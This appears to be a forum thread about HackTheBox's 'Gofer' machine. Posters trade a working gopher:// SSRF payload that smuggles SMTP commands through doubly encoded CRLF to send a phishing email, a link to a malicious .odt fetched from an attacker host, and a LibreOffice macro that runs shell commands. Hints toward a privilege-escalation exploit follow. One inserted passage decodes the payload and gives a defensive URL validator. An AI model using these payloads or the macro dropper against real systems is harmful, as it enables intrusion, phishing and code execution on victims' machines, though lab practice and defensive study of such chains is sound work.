(Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
That's nice. What are you using for the .odt file? I tried exploit/multi/fileformat/libreoffice_macro_exec on msf but didn't work.
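Seen from the defender's side, the URL quoted above combines three things a server-side URL fetcher should refuse: a non-web scheme (gopher), a host written as a bare integer (2130706433 is 127.0.0.1), and doubly percent-encoded CR/LF (%250d%250a). The following is an added example, not part of any post in this thread; the function names and the http/https-only policy are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the fetcher only needs web URLs

def numeric_host_to_ip(host):
    """Decode inet_aton-style IPv4 hosts (decimal, 0x hex, leading-0 octal, 1-4 parts)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        if not (p.isascii() and p.isalnum()):
            return None
        base = 16 if p.lower().startswith("0x") else 8 if len(p) > 1 and p[0] == "0" else 10
        try:
            nums.append(int(p, base))
        except ValueError:
            return None  # an ordinary hostname, not a numeric form
    *head, tail = nums
    tail_bytes = 4 - len(head)  # the last part fills all remaining bytes
    if any(n > 255 for n in head) or tail >= 256 ** tail_bytes:
        return None
    value = tail
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return ipaddress.IPv4Address(value)

def check_fetch_url(url):
    """Return (allowed, reason) for a URL a server-side fetcher was asked to load."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme '{parts.scheme}' not allowed"
    decoded = url
    for _ in range(3):  # undo nested percent-encoding such as %250d%250a
        decoded = unquote(decoded)
    if "\r" in decoded or "\n" in decoded:
        return False, "encoded CR/LF in URL"
    host = parts.hostname or ""
    ip = numeric_host_to_ip(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)  # IPv6 literals such as ::1
        except ValueError:
            pass
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local):
        return False, f"host '{host}' is internal address {ip}"
    # Real hostnames still need the resolved address checked at connect time (needs DNS).
    return True, "ok"
```
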
[quote="frfrfrfrfrfrf" pid='81493' dateline='1690745736']
Try this one: gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
[/quote]
Based on this PoC, I can't use it, can you help me?
Jul 31, 2023, 11:39 AM
(This post was last modified: Jul 31, 2023, 11:39 AM by cutty.)
(Jul 31, 2023, 02:54 AM)chickensaladsand Wrote: (Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
That's nice. What are you using for the .odt file? I tried exploit/multi/fileformat/libreoffice_macro_exec on msf but didn't work.
I created mine manually. The macro isn't complicated:
Sub Main
Shell("<CMD>")
End Sub
You can do this in LibreOffice Writer.
Has anyone finished it, can I ask?
thanks for the information friend
May I ask where your macro is placed, this is my command "gopher%253A%252F%252Fgofer.htb%253A25%252FxHELO%2520gopher.htb%250AMail%2520From%253A%2520%253Cbaihu%2540site.com%253E% 250ARCPT%2520To%253A%2520%253Cjdavis%2540gofer.htb%253E%250AData%250ATo%253A%2520jdavis%2540gofer.htb%250AFrom%253A%2520baihu%2540site.com%250ADate%253A %2520Mon%252C%25207%2520Nov% 25202016%252008%253A45%253A16%250ASubject%253A%2520An%2520example%2520email%250A%250A%253Ca%252Bhref%253D%2522http%253A%252F%252F10.10.16. 14%253A8000%252F1.odt%253E%250ASub% 2520Main%250A%2520%2520%2520%2520Shell(%2522ls%2522)%250AEnd%2520Sub%250A%253C%252Fa%253E%250A%250A.%250A%250AQUIT%250d%250a"
(Jul 31, 2023, 01:09 PM)BaiHu Wrote: May I ask where your macro is placed, this is my command "gopher%253A%252F%252Fgofer.htb%253A25%252FxHELO%2520gopher.htb%250AMail%2520From%253A%2520%253Cbaihu%2540site.com%253E% 250ARCPT%2520To%253A%2520%253Cjdavis%2540gofer.htb%253E%250AData%250ATo%253A%2520jdavis%2540gofer.htb%250AFrom%253A%2520baihu%2540site.com%250ADate%253A %2520Mon%252C%25207%2520Nov% 25202016%252008%253A45%253A16%250ASubject%253A%2520An%2520example%2520email%250A%250A%253Ca%252Bhref%253D%2522http%253A%252F%252F10.10.16. 14%253A8000%252F1.odt%253E%250ASub% 2520Main%250A%2520%2520%2520%2520Shell(%2522ls%2522)%250AEnd%2520Sub%250A%253C%252Fa%253E%250A%250A.%250A%250AQUIT%250d%250a"
The macro goes in a malicious odt file
(Jul 31, 2023, 09:36 PM)deathfrom Wrote: I am stuck on the pwn challenge for root. Any suggestions?
Try reversing it. It's not a traditional BOF btw. If you play with the options, you'll be able to overwrite user privs to get admin status. The rest is, essentially, wildcard injection.
(Aug 01, 2023, 12:04 AM)breher Wrote: hey guys. Also very stuck at this final pwn challenge. Can someone give a suggestion how to become an admin with this app?
not really a reversing guy
Case 8 is important. Look at what it does; if you don't know what the syntax does, google it. Understand what 0x.. means and how to translate it to a normal thing.